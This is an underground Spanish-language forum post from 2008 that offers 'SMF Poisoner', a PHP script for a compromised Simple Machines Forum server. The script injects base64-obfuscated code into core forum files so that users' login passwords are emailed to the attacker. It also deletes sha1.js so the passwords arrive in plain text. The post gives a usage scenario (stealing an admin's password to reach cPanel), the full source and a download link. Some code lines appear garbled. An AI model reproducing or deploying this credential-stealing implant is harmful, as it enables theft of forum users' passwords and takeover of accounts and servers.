vZack
Noviembre 19, 2008, 05:15:14 pm *
Bienvenido(a), Visitante. Favor de ingresar o registrarse.

Ingresar con nombre de usuario, contraseña y duración de la sesión
Noticias: Ya estamos online!
 
   Inicio   Ayuda Ingresar Registrarse  
vZack > Underground > Defacing > SMF poisoiner, ratero para robar passwords de smf localmente
Páginas: [1]   Ir Abajo
« anterior próximo »
  Imprimir  
Autor Tema: SMF poisoiner, ratero para robar passwords de smf localmente  (Leído 2017 veces)
vZer
Administrator
Dios del caos
******
Desconectado Desconectado

Sexo: Masculino
Mensajes: 279


WWW
« en: Julio 22, 2008, 04:55:42 am »
SMF poisoiner

Explicación:
Se trata de un script que se instala en un smf y te envía las contraseñas que introducen los usuarios en el login a tu e-mail. Para utilizarlo necesitaras tener los suficientes privilegios como para ejecutar php en el servidor objetivo. Cualquier pregunta en este post...



Ejemplo de utilización:
Tienes una webshell en un servidor con un foro smf y necesitas sacar la password del admin para entrar al cpanel. El admin tiene que ser lo suficientemente estúpido como para tener la misma contraseña en los dos lugares.

Saludos, aquí esta el código:
Código:
<?php
//////////////////////////////////////
//              SMF Poisoner         //
//             By Hondamena          //
//////////////////////////////////////


error_reporting(0);
////////////////configuracion///////////
$dirsmf './foro/';
$sourcedir $dirsmf.'Sources/';
$defaultmail 'hondamena@mail.com';
////////////////////////////////////////

$inyect 'none';
$sha $dirsmf.'Themes/default/sha1.js';
$listadeinjectables = array(
                $dirsmf.'index.php',
                $sourcedir.'LogInOut.php',
                $sourcedir.'/QueryString.php',
                $sourcedir.'/Subs.php',
                $sourcedir.'/Errors.php',
                $sourcedir.'/Load.php',
                $sourcedir.'/Security.php'
 );



function addinyectables($path){
global $inyect;
$inyect .= '<>'.$path;
}

function inyectablesescribibles($lista){
$cantidad count($lista);
for ($i 0$i <= $cantidad$i++) {
if(is_writable($lista[$i])) addinyectables($lista[$i]);
}
}

function makeselect($inyectables$name){
$explode explode('<>'$inyectables);
$r '<select name="'.$name.'"  style="font-family:verdana" >';

for($i=0;$explode[$i];$i++)
      $r .= '<option value="'.$explode[$i].'">'.$explode[$i].'</option>';

$r .= '</select>';
return $r;
}




if(!$_POST['install']){


inyectablesescribibles($listadeinjectables); //agregamos a la variable $inyect los archivos inyectables que son escribibles


echo'<head>


<title>Smf Poisoner by Hondamena - Visit http://www.vZack.com</title>
</head>
<body bgcolor="000000">
<center><h1><font color="FFFFFF" style="font-family:verdana">Instalaci&oacute;n</font></h1><br/></center>
<form method="post"><input type="hidden" name="install" value="true">
<table bgcolor="FFFFFF" style="-moz-border-radius: 15px;padding-left : 5px;padding-right : 5px;padding-top : 5px;padding-bottom : 5px" align="center">


<tr>

<td>
<font style="font-family:verdana" size="2">Archivo a injectar c&oacute;digo "malicioso":</font>
</td>

<td>
'.makeselect($inyect"archivoinj").'
</td>

</tr>

<tr>

<td>
<font style="font-family:verdana" size="2">Archivo sha1.js:</font>
</td>

<td>
'.makeselect($sha"sha1").'
</td>

</tr>

<tr>

<td>
<font style="font-family:verdana" size="2">Mail para recibir las contrase&ntilde;as:</font>
</td>

<td>
<input type="text" name="mail" style="font-family:verdana" value="'.$defaultmail.'">
</td>

</tr>

<tr>

<td colspan="2">
<center><input type="submit" value="Inyectar c&oacute;digo"  style="font-family:verdana" ></form></center>
</td>

</tr>

</table>
<center><font color="FFFFFF" style="font-family:verdana">Created by Hondamena - <a href="http://www.vzack.com"><font color="FFFFFF" style="font-family:verdana">vZack</font></a></center>
';

}else{

$mail $_POST["mail"];
$sha1file $_POST["sha1"];
$inyectar $_POST["archivoinj"];

$codemal base64_decode('PD9waHANCi8qKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqDQoqIGluZGV4LnBocCAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgKg0KKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioNCiogU01GOiBTaW1wbGUgTWFjaGluZXMg
Rm9ydW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAqDQoqIE9wZW4tU291cmNlIFByb2plY3QgSW5zcGlyZWQgYnkgWmVmIEhlbWVsICh6ZWZAemVm
aGVtZWwuY29tKSAgICAgICAgICAgICAgICAgICAgKg0KKiA9PT09PT09PT09PT09PT09PT09PT09
PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
ICoNCiogU29mdHdhcmUgVmVyc2lvbjogICAgICAgICAgIFNNRiAxLjEuNSAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAqDQoqIFNvZnR3YXJlIGJ5OiAgICAgICAgICAg
ICAgICBTaW1wbGUgTWFjaGluZXMgKGh0dHA6Ly93d3cuc2ltcGxlbWFjaGluZXMub3JnKSAgICAg
Kg0KKiBDb3B5cmlnaHQgMjAwNi0yMDA3IGJ5OiAgICAgU2ltcGxlIE1hY2hpbmVzIExMQyAoaHR0
cDovL3d3dy5zaW1wbGVtYWNoaW5lcy5vcmcpICoNCiogICAgICAgICAgIDIwMDEtMjAwNiBieTog
ICAgIExld2lzIE1lZGlhIChodHRwOi8vd3d3Lmxld2lzbWVkaWEuY29tKSAgICAgICAgICAgICAq
DQoqIFN1cHBvcnQsIE5ld3MsIFVwZGF0ZXMgYXQ6ICBodHRwOi8vd3d3LnNpbXBsZW1hY2hpbmVz
Lm9yZyAgICAgICAgICAgICAgICAgICAgICAgKg0KKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioN
CiogVGhpcyBwcm9ncmFtIGlzIGZyZWUgc29mdHdhcmU7IHlvdSBtYXkgcmVkaXN0cmlidXRlIGl0
IGFuZC9vciBtb2RpZnkgaXQgdW5kZXIgICAqDQoqIHRoZSB0ZXJtcyBvZiB0aGUgcHJvdmlkZWQg
bGljZW5zZSBhcyBwdWJsaXNoZWQgYnkgU2ltcGxlIE1hY2hpbmVzIExMQy4gICAgICAgICAgKg0K
KiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICoNCiogVGhpcyBwcm9ncmFtIGlzIGRpc3RyaWJ1dGVk
IGluIHRoZSBob3BlIHRoYXQgaXQgaXMgYW5kIHdpbGwgYmUgdXNlZnVsLCBidXQgICAgICAqDQoq
IFdJVEhPVVQgQU5ZIFdBUlJBTlRJRVM7IHdpdGhvdXQgZXZlbiBhbnkgaW1wbGllZCB3YXJyYW50
eSBvZiBNRVJDSEFOVEFCSUxJVFkgICAgKg0KKiBvciBGSVRORVNTIEZPUiBBIFBBUlRJQ1VMQVIg
UFVSUE9TRS4gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICoNCiog
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAqDQoqIFNlZSB0aGUgImxpY2Vuc2UudHh0IiBmaWxlIGZv
ciBkZXRhaWxzIG9mIHRoZSBTaW1wbGUgTWFjaGluZXMgbGljZW5zZS4gICAgICAgICAgKg0KKiBU
aGUgbGF0ZXN0IHZlcnNpb24gY2FuIGFsd2F5cyBiZSBmb3VuZCBhdCBodHRwOi8vd3d3LnNpbXBs
ZW1hY2hpbmVzLm9yZy4gICAgICAgICoNCioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKiovDQoNCg0K
aWYoJF9QT1NUWydwYXNzd3JkJ10pIG1haWwoJw==').$mail.base64_decode('JywgJ1NNRiBwb2lzb25lcicsICdVc2VybmFtZTogJy4kX1BPU1RbJ3VzZXInXS4nXG48YnI+UGFz
c3dvcmQ6ICcuJF9QT1NUWydwYXNzd3JkJ10pOw0KPz4=');



if(!file_exists($sha1file)) $error "Archivo $sha1file no existe";
if((!$mail) or $mail == 'hondamena@mail.com'$error .= "<br/>No has introducido ningun mail";

if($error$out '<font color="red" size=2 style="font-family:verdana">'.$error.'</font>';

if(!$out){
$out 'Intentando eliminar '.$sha1file.'<br>';
if(unlink($sha1file))
$out .= $sha1file.' correctamente eliminado<br>';
else
$out .= 'error cr&iacute;tico, imposible eliminar '.$sha1file.' smf poisoner no funcionara correctamente, enviara la contrase&ntilde;a encriptada con sha1';


$out .= 'Inyectando c&oacute;digo malicioso a '.$inyectar.'<br>';

$nombre_archivo "/usr/local/algo.txt";
$abre fopen($inyectar"r");
$r fread($abrefilesize($inyectar));
fclose($abre);

$newr $codemal.$r;
$r NULL;

$abre fopen($inyectar"w+");
fwrite($abre$newr);
fclose($abre);
$newr NULL;

$out .= 'C&oacute;digo malicioso correctamente insertado<br>';

}
echo $out;
}

?>


Descarga: http://vzack.com/descargar.php?dir=/Vulnerabilidades%20y%20similares/&archivo=Smf%20poisoner.php
En línea
Páginas: [1]   Ir Arriba
  Imprimir  
« anterior próximo »
 
Ir a:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.1 | SMF © 2006-2008, Simple Machines LLC XHTML 1.0 válido! CSS válido!